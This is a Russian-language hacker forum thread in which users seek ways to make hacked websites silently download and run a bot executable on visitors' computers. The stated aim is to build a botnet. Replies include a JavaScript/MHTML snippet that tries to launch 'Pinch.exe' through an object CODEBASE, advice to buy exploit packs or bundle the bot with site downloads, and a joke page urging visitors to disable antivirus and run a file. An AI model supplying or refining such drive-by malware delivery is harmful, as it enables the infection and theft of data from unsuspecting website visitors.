Здравствуйте, подскажите, как сделать так что бы файл грузился и запускался вместе с сайтом, то есть грузиться сначала файл потом файл запускается и дальше грузиться сайт. Хочу подобным методом бота распространить. Я, что то слышал, но не помню возможно PHP скрипт
Значит PHP, можете выложить подобный скрипт загрузки и запуска. У меня просто есть кучя взломанных сайтов внедрив в которые этот скрипт и залив бота в директорию его можно оч удобно распространять.
Обана, я тоже хочу через html ботнет построить! И ни каких тебе связок и т.п. заморочек! Научите а?! XD
КОроче в теории должно быть так: человек заходит на взломанный сайт вместе со всякими картинками из директории сайта грузиться и мой bot.exe и запускается. Как это реализовать?
1.всю страницу взять в скрытый div и при полной загрузке этот div делать видимым 2.можно так ж сделать вывод загрузки bot.exe, flush() и тут ж sleep(), но тут не прогадаешь за сколько загрузится этот файл
Я не очень в это селен можешь пожалуйста все оформить как все должно быть что бы просто всавить в index и прописать путь к файлу.
А может както с помощью JS IME-Version: 1.0 Content-Location:file:///Pinch.exe Content-Transfer-Encoding: base64 <title>Welcome - Home</title> <body bgcolor=black scroll=no> <script> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write( ' <title>Welcome - Home</title> <body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;"> Sorry, Error On This Page! Please Open With Internet Explorer</center> <object style="cursor:cross-hair" alt="Sorry, Error On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe"> </object>') } setTimeout("malware()",150) </script> Чет типо того. как правельно сделать?
+++++ Загрузка файла без палева с помощью эксплоитов, ищи связки в паблике (старые как правило, с мизерным пробивом) или покупай приватные. Если на сайтах есть фалы для загрузки - клей с ними свой бот и лей обратно на сайт.
Code: <!doctype html> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Иксплоет</title> </head> <body> Здраствуйте, я вот начинающий хакир и мне очень нужна ваша помощь! Скачайте пожалуйста этот <a href="z.exe">файл</a> и запустити что бы я распространил своего бота, очень срочна надо только перед этим отключите антивирусы, ато ничего не получиться, я не буду делать ничего плохого, чесно-чесно! </body> </html>
+1 CoolZiro, дружище, это называется эксплоит и реализуется через уязвимости в браузерах.А еще бывают дяди, что объединяют несколько эксплоитов в паки (связки) и продают за большие денюжки, я являюсь счастливым обладателем YES exploit pack'а за 700$